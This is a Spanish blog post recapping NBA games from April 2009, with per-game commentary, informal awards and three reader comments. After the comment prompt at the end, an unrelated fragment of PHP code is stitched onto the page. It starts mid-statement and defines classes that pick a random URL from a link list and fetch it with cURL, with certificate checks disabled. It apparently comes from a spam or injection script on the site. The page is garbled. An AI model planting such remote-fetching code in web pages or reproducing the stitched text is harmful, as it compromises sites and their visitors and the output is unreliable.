La Crónica (último gran viernes)

11 de April de 2009 por TheDeerHunter

No va más, señores. La regular se termina. Todas y cada una de las ecuaciones se van resolviendo y definitivamente pocos cambios habrán más allá de lo que ya se sabía.

Los Cavs confirmaron anoche su primer puesto del Este en una plaza con tanta solera como la de Philadelphia. Lebron, implacable, también ha dejado visto para sentencia la ventaja campo hasta la final y el MVP. El equipo llega enterito a la hora de la verdad y frenarlos va a resultar complicadísimo.

Ninguno de los que teóricamente están en condiciones de hacerlo muestra ni de lejos tal fortaleza. Los Celtics, sin Garnett ni Powe pero con otra gran noche de Glen Davis, sufrieron para doblegar a unos buenos Heat. Mucho mérito tienen esas 60 victorias con la segunda plaza del Este, aunque nadie la hubiera firmado.
Peor sabor de boca para Lakers con la enésima derrota en el Rose Garden. El panorama ahora mismo sería visitar primero Salt Lake City y después Portland. Menudo premio para una buena temporada de casi todos. No lo ha sido para Jordan Farmar. Empezará los playoffs siendo el tercer base del equipo, aunque al menos con Odom el banquillo tiene otra pinta. Impresionante partido el de Rudy anoche, por cierto… y Ariza de espectador privilegiado, que poquito más pudo hacer el hombre. Ni lo olió.

Para tropezón gordo el de Orlando contra los Knicks en Florida. D’Antoni es bien capaz de destapar las vergüenzas de sus rivales y con el culo al aire quedó la línea exterior local. Que se preparen para playoffs los Turkoglu (3-8 en 3p), Lewis (1-6), Redick (0-5), Alston (0-1), Pietrus (0-1) o Anthony Johnson (1-3) Cuánto de menos pueden echar a Nelson a partir de ahora.

Además de la clarificación de las posiciones cabeceras, la otra importante noticia de la noche es la clasificación de Detroit. Lograda a la vieja usanza, con todos arrimando el hombro sin nadie que les enturbie. Y de paso con Will Bynum en estado de gracia que es quien más celebra de todos el “affer AI”. Victoria clara contra unos Vince&Harris desconocidos y tropiezo definitivo de los Bobcats en Oklahoma… con Radmanovic de titular (cosas de gurús que los mortales no comprendemos)

Tan sólo queda por aclarar fundamentalmente el orden en el Oeste. En esta guerra victoria importantísima de los Rockets en Oakland, sin Yao pero con Mutombo rememorando viejas hazañas y Scola ejerciendo de lo que és, un auténtico líder.
También trabajadísima la victoria de los Spurs ante los Jazz, con Gooden y Udoka dando un paso adelante en la adversidad. Por si todo esto era poco, impresionante victoria de los Mavs contra los Hornets y los tejanos en su mejor momento de la temporada, con todo lo que les ha llovido. We believe??

En el resto de partidos poco o nada en juego. Atlanta vela armas estos días, pero no aflojó contra Indiana.
Además destacaremos la actuación de Marc (otra más) contra Shaq en la victoria de Memphis contra los Suns o la correcta de Calderón en otra nueva mala racha de los Raptors.
Por último, los Clippers destrozaron a los Kings… por si a alguien le interesa a estas alturas.

PREMIOS TJNBA:

MVP: Difícil decisión. Como se nota que algunos ya han subido a “modo Playoff”. Lebrón 27 puntos 10 asistencias, Josh Smith&Al Horford ambos increíbles en el partido contra Indiana, Pierce 28 ptos 8 asis finísimo en el tiro, Scola… pero el premio se lo lleva Tony Parker con 31 puntos 6 rebotes y 7asistencias. Qué temporada lleva el francés.

Rookie: Muy bien los de New Jersey, también el interesante duelo entre Westbrook y Augustine, fantástico Beasley que parece haber encontrado el camino. Muy bien Eric Gordon y grandes Rudy&Marc… pero el premio se lo lleva Mayo, una de nuestras debilidades.

La sorpresa: Además de ver a Larry Brown jugársela con Radmanovic en pista (que esa no cuenta), una de las grandes y gratas sorpresas de la temporada va a ser Will Bynum. Que finalmente les ha sacado las castañas a Dumars y Detroit… al menos hasta donde le han dejado.

La decepción: Después de la temporada que han realizado, ver a Vince Carter y Devin Harris hacer 7 puntos entre los dos sabe todavía peor. Los que se acordarán de sus parientes cercanos son los seguidores de los Bobcats… aunque no conocemos a ninguno de ellos.

El mayor esfuerzo en vano: Ya sabeis lo que toca cuando pierde Miami…

RAZONES PARA TRASNOCHAR:

Alguno podría plantearse el ahorrar sueño de cara a los partidos de verdad y además, esta noche es sábado sabadete… pero si estáis tan enfermos como alguno de nosotros podéis encontrar interés en el duelo por la 7ª plaza del Este. Detroit juega en Indiana a la 1 A.M. (nuestra) y Chicago recibe a los Bobcats a las 2:30h.

Jugador a seguir… Deron Williams contra los Warriors. Aunque últimamente se prestan algo menos, le toca a él lucirse la próxima madrugada.

Comenta

3 comentarios a esta entrada

  1. Gallis dice:
    #1

    Joder, que pereza dan los Blazers…

    Y el calendario que se le va a quedar a los Lakers tiene tela, aunque me da a mí que los Blazers van a tener que su dar sangre si quieren eliminar a los Spurs (cosa que de hecho, dudo muchísimo).

      Citar

  2. Dantley2 dice:
    #2

    Impresionante Mutombo, 42 añitos, 15 rebotes.

    Lo de los Lakers con los Blazers hay que estudiarlo seriamente.

      Citar

  3. Jabho dice:
    #3

    Yo iba vez que Manu se lesionó no veo rival para los Lakers. Sobre el papel cualquiera,pero sino llegan a la final creo que será por deméritos propios.

    A mi me están dando búen filling los Mavs. Los veo dando guerra

    Y los céltics para estar sin Garnett bastante bien.casi han confirmado su 2 puesto que no está mal…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>